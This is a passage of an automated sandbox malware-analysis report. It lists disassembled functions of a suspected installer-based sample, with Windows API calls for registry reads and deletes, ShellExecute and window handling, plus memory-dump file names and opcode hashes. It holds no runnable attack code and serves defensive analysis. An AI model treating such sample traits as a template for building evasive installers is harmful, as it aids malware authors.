                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 334405425-0
                                                                                              • Opcode ID: 0b89ead58d390ff17d881e3191b7456e368a4c726051eef4ac93ade2398fe5f3
                                                                                              • Instruction ID: a11216cf4d9ed69530e7a3120e2c7e0776abe0d849fb671ec08c4598754a23ed
                                                                                              • Opcode Fuzzy Hash: 0b89ead58d390ff17d881e3191b7456e368a4c726051eef4ac93ade2398fe5f3
                                                                                              • Instruction Fuzzy Hash: 2821B671904215F6CF206F95CE48ADE7AB4AB04358F70417BF611B51E0C7B98D81DA6D
                                                                                              APIs
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00401B92
                                                                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFree
                                                                                              • String ID: Call
                                                                                              • API String ID: 3394109436-1824292864
                                                                                              • Opcode ID: 964461071e6e80e359c9697dbfefeb40b1bd3ce1e0a189f69a8cb19f70afb2f2
                                                                                              • Instruction ID: 0e9c0b35001f1033de5fa53c21d3cf865b558ccbe2596cbe26b498a02803ad8f
                                                                                              • Opcode Fuzzy Hash: 964461071e6e80e359c9697dbfefeb40b1bd3ce1e0a189f69a8cb19f70afb2f2
                                                                                              • Instruction Fuzzy Hash: 32219CB2600504A7CB10EB94DE85D6EB3A4EF44318B20443BF101B72E1D77C98458F5D
                                                                                              APIs
                                                                                                • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000004C8,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402483
                                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402496
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnA538.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Enum$CloseOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 167947723-0
                                                                                              • Opcode ID: 0ef88ddf6a77f3597932d5f5950ccac7ebba6e42faf31082df8434657d37fe38
                                                                                              • Instruction ID: 9b4534643d4666439fb6e7fa0780ec568e551195bda58a6737a49a93b172aaf7
                                                                                              • Opcode Fuzzy Hash: 0ef88ddf6a77f3597932d5f5950ccac7ebba6e42faf31082df8434657d37fe38
                                                                                              • Instruction Fuzzy Hash: 7EF0D1B1A04204AFEB148FA5DE88EBF767CEF40358F10483EF001A21C0D6B85D419B2A
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Program Files (x86)\shaw,?), ref: 00401E3D
                                                                                              Strings
                                                                                              • C:\Program Files (x86)\shaw, xrefs: 00401E26
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecuteShell
                                                                                              • String ID: C:\Program Files (x86)\shaw
                                                                                              • API String ID: 587946157-209812835
                                                                                              • Opcode ID: 7587e70040bd90d9a45c77b38d5a8326e6407a8cac713d4af707f877f72f6e69
                                                                                              • Instruction ID: 1d84af77b3b092231a8c26a4bbf5194ed9fa03af7e80c3faa1f479241ca17973
                                                                                              • Opcode Fuzzy Hash: 7587e70040bd90d9a45c77b38d5a8326e6407a8cac713d4af707f877f72f6e69
                                                                                              • Instruction Fuzzy Hash: 5EF0C275B14200BACB006FB59D4AF9E73B8AB24729F300936F402F70D1D6FC88419628
                                                                                              APIs
                                                                                                • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000004C8,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnA538.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: 65fa667fb9a4e770228c9edaf60a266106b1654de64b854c0c014628474dfe3e
                                                                                              • Instruction ID: 1209522b8d3984a6b4610ed026cffc7dab670339dbbb9e9ecb5883d5f24cd4f7
                                                                                              • Opcode Fuzzy Hash: 65fa667fb9a4e770228c9edaf60a266106b1654de64b854c0c014628474dfe3e
                                                                                              • Instruction Fuzzy Hash: D5117371915205EEDF14CFA0C6889AFB7B4EF44359F20843FE042A72D0D7B85A41DB5A
                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 3b73f58598246971e780ef50935e80d1208b404ce952b395e35e3e50ed7a2881
                                                                                              • Instruction ID: a30e82e9015a098eeac925556b61d7d627792a5c50f4ab7e1fdfecd72b7c1cbe
                                                                                              • Opcode Fuzzy Hash: 3b73f58598246971e780ef50935e80d1208b404ce952b395e35e3e50ed7a2881
                                                                                              • Instruction Fuzzy Hash: BE01D131B24210ABE7295B389C09B6A3698E710314F54863EB911F72F1DA78DC139B49
                                                                                              APIs
                                                                                                • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000004C8,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseDeleteOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 849931509-0
                                                                                              • Opcode ID: 150793ea9c0f0f78d5fe339fdd0b38b4f286fd840457b64defc1be174833c637
                                                                                              • Instruction ID: cc00155b087d305277611582236cd6af1522243532d64526095e9acb0e968863
                                                                                              • Opcode Fuzzy Hash: 150793ea9c0f0f78d5fe339fdd0b38b4f286fd840457b64defc1be174833c637
                                                                                              • Instruction Fuzzy Hash: 92F06272A04210ABEB15AFF59A4EBAE7278DB04318F20453BF201B71D1D9FC5D028A6D
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1268545403-0
                                                                                              • Opcode ID: de5aa4c1bb5d3f8e11959e1fc0988361606b0ee9916d96b78fe158bf821141de
                                                                                              • Instruction ID: 292fe9cfc42e020ccba4ca1aabd821194ff51ac34ef1c963243808ae8aa21162
                                                                                              • Opcode Fuzzy Hash: de5aa4c1bb5d3f8e11959e1fc0988361606b0ee9916d96b78fe158bf821141de
                                                                                              • Instruction Fuzzy Hash: 9CE04872B101049BCB14CBA4ED808FDB7A5A744314754457FD502B3190C6759C118F28
                                                                                              APIs
                                                                                              • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
